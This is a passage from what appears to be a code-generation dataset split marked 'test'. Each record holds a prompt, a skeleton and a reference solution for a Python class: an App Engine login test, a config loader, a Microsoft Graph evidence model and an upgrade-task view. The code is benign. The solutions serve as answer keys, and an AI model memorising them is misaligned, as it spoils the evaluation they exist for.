set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 'admin' query argument. continue_url: Value of the 'continue' query argument. method: The HTTP method (e.g., 'GET'). Returns: Tuple (status, location, set_cookie, content_type) where each value is the value of the corresponding header from the response; if no header exists, the value will be None. In the case of status, it will just return the integer statu\"\"\"\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n", "source": "the_stack_v2_python_sparse", "source_path": "AppServer/google/appengine/tools/devappserver2/login_test.py", "source_repo": "obino/appscale", "split": "test", "star_events_count": 1} {"blob_id": "dc0e9a7ab602dee118382eeedce4d7bd1ec8f74b", "bodies": ["_filename = ConfigManager.fallback_file(filename)\nwith open(_filename) as f:\n self._config = json.loads(f.read())", "def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\ndef new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\ntarget = to_symbol(target)\nif target == 'bgm':\n result = new_bgm()\nelif target == 'mal':\n result = new_mal()\nelse:\n result = Hiromi(new_bgm, new_mal)\nreturn result", "file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\nfor a_file in file_list:\n if path.exists(a_file):\n return a_file\nprint('Please given a legal config file, or make a config file at~/.hiromi or ~/.config/hiromi.json')\nraise ConfigNotFoundException()"], "bodies_text": "<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please given a legal config file, or make a config file at~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "class_docstring": "Docstring for ConfigManager.", "class_name": "ConfigManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please given a legal config file, or make a config file at~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000195", "length_bytes": 2533, "license_type": "permissive", "methods": [{"docstring": "TODO :param filename: TODO", "name": "__init__", "signature": "def __init__(self, filename)"}, {"docstring": "Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite", "name": "load_config", "signature": "def load_config(self, target)"}, {"docstring": "Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite", "name": "fallback_file", "signature": "def fallback_file(cls, filename)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000382", "prompt": "Implement the Python class `ConfigManager` described below.\n\nClass description:\nDocstring for ConfigManager.\n\nMethod signatures and docstrings:\n- def __init__(self, filename): TODO :param filename: TODO\n- def load_config(self, target): Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\n- def fallback_file(cls, filename): Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite", "prompted_full_text": "Implement the Python class `ConfigManager` described below.\n\nClass description:\nDocstring for ConfigManager.\n\nMethod signatures and docstrings:\n- def __init__(self, filename): TODO :param filename: TODO\n- def load_config(self, target): Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\n- def fallback_file(cls, filename): Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\n\n<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n<|end_body_0|>\n\n<|body_start_1|>\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please given a legal config file, or make a config file at~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n<|end_body_2|>\n", "revision_id": "4cc9552411ed8327fdb48ad6f9af110fe2f8657f", "skeleton": "<|skeleton|>\nclass ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n <|body_0|>\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n <|body_1|>\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConfigManager:\n \"\"\"Docstring for ConfigManager.\"\"\"\n\n def __init__(self, filename):\n \"\"\"TODO :param filename: TODO\"\"\"\n _filename = ConfigManager.fallback_file(filename)\n with open(_filename) as f:\n self._config = json.loads(f.read())\n\n def load_config(self, target):\n \"\"\"Return the corresponding string representing the websites. :param str target: TODO :returns: an ``AnimeWebsite`` object, depending on the input :rtype: AnimeWebsite\"\"\"\n def new_bgm():\n return Bangumi(self._config['bgm']['account'], self._config['bgm']['password'])\n\n def new_mal():\n return MyAnimeList(self._config['mal']['account'], self._config['mal']['password'])\n target = to_symbol(target)\n if target == 'bgm':\n result = new_bgm()\n elif target == 'mal':\n result = new_mal()\n else:\n result = Hiromi(new_bgm, new_mal)\n return result\n\n def fallback_file(cls, filename):\n \"\"\"Return the fallback file for config. It will first try given file, then ~/.config/hiromi.json, then ~/.hiromi :param str filename: the given file :returns: a usable filename :rtype: AnimeWebsite\"\"\"\n file_list = (filename, path.join(path.expanduser('~'), '.config', 'hiromi.json'), path.join(path.expanduser('~'), '.hiromi'))\n for a_file in file_list:\n if path.exists(a_file):\n return a_file\n print('Please given a legal config file, or make a config file at~/.hiromi or ~/.config/hiromi.json')\n raise ConfigNotFoundException()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/hiromi/config.py", "source_repo": "hiecaq/hiromi", "split": "test", "star_events_count": 0} {"blob_id": "52a5d62fcccf5911e5875785fa2a864d72050c5b", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn ProcessEvidence()", "from .alert_evidence import AlertEvidence\nfrom .detection_status import DetectionStatus\nfrom .file_details import FileDetails\nfrom .user_account import UserAccount\nfrom .alert_evidence import AlertEvidence\nfrom .detection_status import DetectionStatus\nfrom .file_details import FileDetails\nfrom .user_account import UserAccount\nfields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_enum_value('detectionStatus', self.detection_status)\nwriter.write_object_value('imageFile', self.image_file)\nwriter.write_str_value('mdeDeviceId', self.mde_device_id)\nwriter.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\nwriter.write_int_value('parentProcessId', self.parent_process_id)\nwriter.write_object_value('parentProcessImageFile', self.parent_process_image_file)\nwriter.write_str_value('processCommandLine', self.process_command_line)\nwriter.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\nwriter.write_int_value('processId', self.process_id)\nwriter.write_object_value('userAccount', self.user_account)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ProcessEvidence", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000196", "length_bytes": 5608, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `ProcessEvidence` described below.\n\nClass description:\nImplement the ProcessEvidence class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `ProcessEvidence` described below.\n\nClass description:\nImplement the ProcessEvidence class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProcessEvidence:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/security/process_evidence.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "c475f91975fc5c7382c11142e7a0df106e06df1f", "bodies": ["agent_now = request.user.userinfo.agent\nu_type = request.query_params.get('u_type')\nfilter_data = dict()\nif u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\nupgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n'\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\nupgrade_list = []\nfor u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\nstatus_list = upgrade_tasks.values_list('status', flat=True)\nstatus = 0\nif 0 in status_list:\n status = 1\ncontext = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\nreturn Response(context)", "agent_now = request.user.userinfo.agent\nupgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\nif upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\nelse:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\nupgrade_targets(agent_now, upgrade_detail)\nreturn Response({'msg': '添加升级任务成功', 'status': 200})"], "bodies_text": "<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if 